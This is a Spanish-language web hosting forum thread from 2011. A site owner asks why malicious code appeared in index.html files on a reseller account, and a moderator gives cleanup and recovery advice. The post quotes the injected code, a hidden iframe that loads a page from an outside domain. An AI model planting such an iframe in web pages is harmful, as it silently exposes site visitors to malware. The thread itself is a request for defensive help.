Foros del Web » Administración de Sistemas » Shared Hosting y VPS »

malware/badware en mi reseller?

Estas en el tema de malware/badware en mi reseller? en el foro de Shared Hosting y VPS en Foros del Web. hola a todos. tenemos un hosting linux tipo reseller con whm para administrarlo, donde alojamos nuestras paginas web. recientemente se ha incrustado codigo malicioso en ...
  #1 (permalink)  
Antiguo 28/04/2011, 13:30
 
Fecha de Ingreso: septiembre-2009
Mensajes: 7
Antigüedad: 14 años, 6 meses
Puntos: 0
Pregunta malware/badware en mi reseller?

hola a todos. tenemos un hosting linux tipo reseller con whm para administrarlo, donde alojamos nuestras paginas web. recientemente se ha incrustado codigo malicioso en algunos sitios web, sobretodo en el index.html

este es el codigo que se ha alojado

Código:
<div style="visibility:hidden"><iframe src="http://ads.notariasanchezcalvo.es/ads.php" width=10 height=10></iframe></div>

google termina por declarar el sitio como peligroso y algunos antivirus lo detectan como infectado.

a alguien mas le ha pasado algo similar? saben a que se debe?
  #2 (permalink)  
Antiguo 28/04/2011, 13:47
Avatar de JoshMex
Moderador Webhosting
 
Fecha de Ingreso: enero-2006
Mensajes: 4.057
Antigüedad: 18 años, 1 mes
Puntos: 166
Respuesta: malware/badware en mi reseller?

Te sugiero que cambies el password de tus cuentas ftp, verifique si tu PC está infectado con algún virus, si usas scripts de terceros actualizalos a la última versión.

Limpia tus archivos removiendo el código incrustado, este puede estar en archivos html, asp, php, js, etc; o mejor solicita que restauren un backup de tu sitio web.

Una vez que hallas seguido estos pasos solicita que revisen tu sitio web para que sea removido como peligroso, puedes hacerlo desde el siguiente link

http://stopbadware.org/home/reportsearch
__________________
JoshMex
Desarrollador Plataforma Microsoft / Windows / ASP / ASP.NET / SQL Server
Es inútil hacer cualquier cosa a prueba de tontos, porque los tontos son muy ingeniosos

Etiquetas: badware, malicioso, malware, reseller, web-hosting, whm
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 23:44.